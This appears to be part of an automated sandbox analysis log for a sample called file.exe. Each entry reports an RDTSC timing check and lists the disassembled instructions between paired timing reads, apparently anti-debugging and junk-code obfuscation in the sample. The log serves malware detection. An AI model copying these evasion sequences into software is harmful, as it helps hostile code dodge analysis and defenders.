              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962081 second address: 962085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962A67 second address: 962A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962085 second address: 96208B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963487 second address: 96348B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962A6B second address: 962A75 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E88BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964B05 second address: 964B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96348B second address: 9634A3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FC7B8E88BF8h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964B1E second address: 964B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E52h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968282 second address: 968286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968736 second address: 96873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969703 second address: 9697AD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E88C0Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC7B8E88BFEh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FC7B8E88BF8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jp 00007FC7B8E88BFCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC7B8E88BF8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007FC7B8E88BF8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 mov dword ptr [ebp+122D1863h], ebx 0x0000006f push eax 0x00000070 pushad 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A8F3 second address: 96A8F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A8F9 second address: 96A903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A903 second address: 96A977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FC7B8E46E4Bh 0x00000011 push 00000000h 0x00000013 mov bx, 163Eh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC7B8E46E48h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 push edx 0x00000035 jnc 00007FC7B8E46E54h 0x0000003b pop edx 0x0000003c push eax 0x0000003d jl 00007FC7B8E46E54h 0x00000043 pushad 0x00000044 jc 00007FC7B8E46E46h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B9C8 second address: 96B9EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC7B8E88C02h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B9EA second address: 96B9F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C9D6 second address: 96C9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jnp 00007FC7B8E88C04h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FC7B8E88BF6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C9EB second address: 96CA20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jl 00007FC7B8E46E48h 0x0000000d mov bh, dh 0x0000000f push 00000000h 0x00000011 and edi, 32284424h 0x00000017 mov edi, dword ptr [ebp+122D3B6Fh] 0x0000001d push 00000000h 0x0000001f mov di, 7F21h 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC7B8E46E4Fh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA20 second address: 96CA36 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E88BF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BB30 second address: 96BB48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7B8E46E53h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA36 second address: 96CA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DA27 second address: 96DA34 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DA34 second address: 96DA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88C00h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DADA second address: 96DAF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FC7B8E46E48h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CC00 second address: 96CC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7B8E88C03h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CC2F second address: 96CC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96ED6D second address: 96ED78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970D03 second address: 970D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96ED78 second address: 96ED7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975EBF second address: 975EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975EC3 second address: 975EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976E51 second address: 976E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971F4F second address: 971FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC7B8E88BFBh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 72D407EAh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FC7B8E88BF8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 movsx edi, dx 0x00000037 mov di, si 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, dword ptr [ebp+122D1EFDh] 0x00000047 mov eax, dword ptr [ebp+122D0CB5h] 0x0000004d xor edi, dword ptr [ebp+122D3BD7h] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007FC7B8E88BF8h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 00000016h 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f and ebx, dword ptr [ebp+122D1885h] 0x00000075 sub dword ptr [ebp+12455E11h], esi 0x0000007b nop 0x0000007c jmp 00007FC7B8E88BFCh 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FC7B8E88C07h 0x00000089 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974EF6 second address: 974F03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974F03 second address: 974F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9780BC second address: 978168 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC7B8E46E50h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC7B8E46E48h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FC7B8E46E48h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f clc 0x00000050 mov eax, dword ptr [ebp+122D0479h] 0x00000056 jmp 00007FC7B8E46E4Fh 0x0000005b push FFFFFFFFh 0x0000005d pushad 0x0000005e or dword ptr [ebp+122D326Bh], esi 0x00000064 jmp 00007FC7B8E46E4Ch 0x00000069 popad 0x0000006a mov ebx, dword ptr [ebp+122D3A1Bh] 0x00000070 push eax 0x00000071 push edi 0x00000072 pushad 0x00000073 jmp 00007FC7B8E46E50h 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F03F second address: 97F05B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6A5 second address: 97E6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push edx 0x00000008 jns 00007FC7B8E46E46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6B5 second address: 97E6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6BA second address: 97E6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6C0 second address: 97E6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6CA second address: 97E6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 jmp 00007FC7B8E46E4Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6E9 second address: 97E6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC7B8E88BF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E6F7 second address: 97E703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E703 second address: 97E70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E70D second address: 97E711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E711 second address: 97E71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E71C second address: 97E725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E725 second address: 97E72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E72B second address: 97E72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E72F second address: 97E733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982DC1 second address: 982DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985482 second address: 98548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98548C second address: 9854A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7B8E46E52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9854A3 second address: 9854A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D14 second address: 926D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 jmp 00007FC7B8E46E56h 0x0000000d popad 0x0000000e pushad 0x0000000f jne 00007FC7B8E46E4Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D44 second address: 926D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9866BD second address: 9866F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FC7B8E46E4Eh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FC7B8E46E59h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9866F7 second address: 9866FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9867FD second address: 986844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC7B8E46E51h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jmp 00007FC7B8E46E4Bh 0x00000019 pop eax 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FC7B8E46E4Bh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986844 second address: 98684D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98684D second address: 986851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986995 second address: 9869AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E88C05h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9869AE second address: 9869BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9869BC second address: 9869C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9869C0 second address: 9869EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7B8E46E58h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9869EC second address: 986A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88C07h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B604 second address: 98B60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7B8E46E46h 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B60F second address: 98B62F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B62F second address: 98B63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B63C second address: 98B66F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC7B8E88C06h 0x00000008 jmp 00007FC7B8E88C06h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B972 second address: 98B99E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7B8E46E46h 0x00000008 jmp 00007FC7B8E46E4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC7B8E46E52h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B99E second address: 98B9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC7B8E88C06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BAD5 second address: 98BAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BAD9 second address: 98BAEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88C00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BAEF second address: 98BAF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BF19 second address: 98BF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BF1D second address: 98BF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7B8E46E4Fh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99138F second address: 991393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914646 second address: 91464E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91464E second address: 914652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990130 second address: 990135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990135 second address: 99016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC7B8E88C07h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990497 second address: 99049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
